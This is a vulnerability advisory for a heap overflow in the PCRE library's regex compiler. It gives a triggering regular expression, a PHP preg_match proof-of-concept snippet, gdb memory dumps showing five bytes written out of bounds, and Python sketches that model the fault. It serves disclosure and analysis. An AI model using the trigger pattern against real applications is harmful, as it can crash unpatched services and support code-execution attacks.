I. Summary
PCRE is a C library for regular expressions, inspired by the regular expression capabilities of the Perl programming language. It is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx, and PHP.
The PCRE library is prone to a heap overflow vulnerability. During the compilation of a malformed regular expression, more data is written to the malloc'ed block than the size computed by compile_regex() in its sizing pass. Exploits using advanced heap feng shui techniques may allow an attacker to execute arbitrary code in the context of the user running the affected application.
------------------------------------------------------------------
II. Description
The latest version of PCRE is prone to a heap overflow vulnerability, which can be triggered by the following regular expression:
/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/
To reproduce the problem, use pcretest, which ships with the PCRE library, or an application that bundles PCRE, such as PHP.
For pcretest, simply type the regular expression at the re> prompt.
For PHP, the latest version, PHP 5.6.9 (which bundles PCRE 8.37), can be triggered with the following code snippet:
<?php
preg_match("/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/","ADLAB",$arr);
?>
First, pcre_compile2() invokes compile_regex() to calculate the amount of memory needed to hold the compiled regular expression.
It then allocates a block of that size and stores its address in re.
Next, pcre_compile2() invokes compile_regex() a second time to write the compiled regular expression into the allocated block.
The problem is that the second pass writes more data than the first pass accounted for.
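The measure-then-fill scheme described above can be illustrated with a toy model. The sketch below is not PCRE code: encode(), compile_two_pass() and the wide parameter are hypothetical names, and the only detail borrowed from this report is the 0x1d byte that precedes each literal character in the memory dump later in this section. It shows how a construct that the fill pass encodes with more bytes than the sizing pass counted ends up past the end of the allocated block.

```python
OP_CHAR = 0x1D  # byte preceding each literal character in the dump


def encode(pattern, measuring, wide=frozenset()):
    """Toy encoder: return the bytes emitted for `pattern`.

    `wide` is a hypothetical set of characters for which the fill pass
    emits one byte that the measuring pass never counted.
    """
    out = bytearray()
    for ch in pattern:
        out += bytes([OP_CHAR, ord(ch)])
        if not measuring and ch in wide:
            out.append(0x00)  # extra byte, invisible to the sizing pass
    return bytes(out)


def compile_two_pass(pattern, wide=frozenset()):
    """Return (allocated size, bytes that would spill past the block)."""
    size = len(encode(pattern, measuring=True, wide=wide))  # pass 1: measure
    block = bytearray(size)                                 # stands in for malloc(size)
    code = encode(pattern, measuring=False, wide=wide)      # pass 2: fill
    n = min(size, len(code))
    block[:n] = code[:n]                                    # the part that fits
    spill = max(0, len(code) - size)                        # the part that does not
    return size, spill


print(compile_two_pass(">WGX"))              # passes agree: nothing spills
print(compile_two_pass(">WGX", wide={"G"}))  # passes disagree: one byte spills
```

In C there is no bytearray to absorb the difference, so the spilled bytes land in whatever follows the block on the heap.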
The following test was conducted under Kali Linux (based on Debian, x64) with PHP 5.6.9:
==============================================================
gdb php poc.php
9217 re = (REAL_PCRE *)(PUBL(malloc))(size);
(gdb) x/10i $rip
=> 0x46f3cb <php_pcre_compile2+2187>: mov rdi,rbp
0x46f3ce <php_pcre_compile2+2190>: call QWORD PTR [rax]
(gdb) x $rbp
0x97: Cannot access memory at address 0x97
==============================================================
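rbp, which is moved into rdi as the argument to malloc, holds 0x97, so the expected size of the above regular expression is 0x97 = 151 bytes.
The allocated block starts at 0x1007480.
Here is the memory at 0x1007480 just before the second compile_regex() call (square brackets mark the 0x97-byte block):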
==============================================================
(gdb) x/160x 0x1007480
0x1007480: [0x45 0x52 0x43 0x50 0x97 0x00 0x00 0x00
0x1007488: 0x00 0x00 0x00 0x00 0x00 0x04 0x00 0x00
0x1007490: 0xff 0xff 0xff 0xff 0xff 0xff 0xff 0xff
0x1007498: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074a0: 0x00 0x00 0x40 0x00 0x04 0x00 0x02 0x00
0x10074a8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074b0: 0xd0 0x7a 0x00 0x01 0x00 0x00 0x00 0x00
0x10074b8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074c0: 0x00 0x02 0x42 0x00 0x00 0x03 0x42 0x00
0x10074c8: 0x83 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074d0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074d8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074e0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074e8: 0x80 0x48 0xd8 0xf6 0xff 0x7f 0x00 0x00
0x10074f0: 0xff 0xff 0xff 0xff 0x00 0x00 0x00 0x00
0x10074f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1007500: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1007508: 0x60 0x75 0x00 0x01 0x00 0x00 0x00 0x00
0x1007510: 0xff 0xff 0xff 0xff 0xff 0xff 0xff] 0xff
0x1007518: 0xa1 0x01 0x00 0x00 0x00 0x00 0x00 0x00
==============================================================
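The first eight bytes of the block can be decoded to cross-check the size seen in the debugger. The sketch below assumes that the block begins with two little-endian 32-bit fields, a magic number followed by the block size; that layout is an assumption about the REAL_PCRE header and is not shown in the transcript itself. decode_header() is a hypothetical helper name.

```python
import struct

# First eight bytes at 0x1007480, copied from the dump above.
header = bytes([0x45, 0x52, 0x43, 0x50, 0x97, 0x00, 0x00, 0x00])


def decode_header(raw):
    """Return (magic as ASCII text, size), assuming two little-endian uint32 fields."""
    magic, size = struct.unpack("<II", raw[:8])
    return magic.to_bytes(4, "big").decode("ascii"), size


magic_text, size = decode_header(header)
print(magic_text, hex(size), size)  # PCRE 0x97 151
```

Under that assumption the second field matches the 0x97 passed to malloc.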
After the second compile_regex() call:
==============================================================
(gdb) x/160x 0x1007480
0x1007480: [0x45 0x52 0x43 0x50 0x97 0x00 0x00 0x00
0x1007488: 0x00 0x00 0x00 0x00 0x00 0x04 0x00 0x00
0x1007490: 0xff 0xff 0xff 0xff 0xff 0xff 0xff 0xff
0x1007498: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074a0: 0x00 0x00 0x40 0x00 0x04 0x00 0x02 0x00
0x10074a8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074b0: 0xd0 0x7a 0x00 0x01 0x00 0x00 0x00 0x00
0x10074b8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074c0: 0x00 0x02 0x42 0x00 0x00 0x03 0x42 0x00
0x10074c8: 0x83 0x00 0x51 0x1b 0x73 0x00 0x00 0x00
0x10074d0: 0x02 0x85 0x00 0x45 0x00 0x01 0x73 0x00
0x10074d8: 0x00 0x00 0x02 0x83 0x00 0x22 0x85 0x00
0x10074e0: 0x07 0x00 0x02 0x1d 0x63 0x78 0x00 0x07
0x10074e8: 0x81 0x00 0x12 0x85 0x00 0x0c 0x00 0x03
0x10074f0: 0x1d 0x61 0x73 0x00 0x00 0x00 0x02 0x78
0x10074f8: 0x00 0x0c 0x78 0x00 0x12 0x78 0x00 0x22
0x1007500: 0x1d 0x3e 0x1d 0x57 0x1d 0x47 0x1d 0x58
0x1007508: 0x1d 0x43 0x1d 0x52 0x1d 0x45 0x1d 0x44
0x1007510: 0x1d 0x49 0x1d 0x54 0x1d 0x53 0x78] *0x00
0x1007518: *0x45 *0x78 *0x00 *0x51 0x00 0x00 0x00 0x00
==============================================================
In this case, five bytes (marked with * above) are written past the end of the block.
This overflow can be used to modify the length field of an adjacent array, vector, or string, giving the attacker the ability to read and write the whole memory in the context of the affected application (the same trick as in CVE-2013-0634).
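The five-byte figure can be checked against the two dumps. The sketch below takes the last two rows of each dump (starting at 0x1007510), computes the end of the block as base + size, and reports which bytes at or beyond that address differ. overflow_extent() is a hypothetical helper, and the extent it returns assumes the out-of-bounds write is contiguous up to the last changed byte.

```python
BASE, SIZE = 0x1007480, 0x97
ROW = 0x1007510  # address of the first byte in the two rows below

# Rows 0x1007510 and 0x1007518, before and after the second pass.
before = bytes.fromhex("ffffffffffffffff" "a101000000000000")
after = bytes.fromhex("1d491d541d537800" "4578005100000000")


def overflow_extent(base, size, row, before, after):
    """Return (block end, changed addresses past the end, extent in bytes)."""
    end = base + size  # first address outside the block
    changed = [
        row + i
        for i, (b, a) in enumerate(zip(before, after))
        if b != a and row + i >= end
    ]
    extent = max(changed) - end + 1 if changed else 0
    return end, changed, extent


end, changed, extent = overflow_extent(BASE, SIZE, ROW, before, after)
print(hex(end), [hex(a) for a in changed], extent)
```

Only four addresses show a changed value, because the byte at 0x100751a holds 0x00 in both dumps; the extent still spans 0x1007517 through 0x100751b, which is five bytes.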
------------------------------------------------------------------
III. Impact
Heap Overflow
------------------------------------------------------------------
IV. Affected
PCRE version > 8.33 (8.34, 8.35, 8.36, 8.37 are confirmed to be vulnerable).
PCRE2 10.10 is also confirmed to be vulnerable.
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.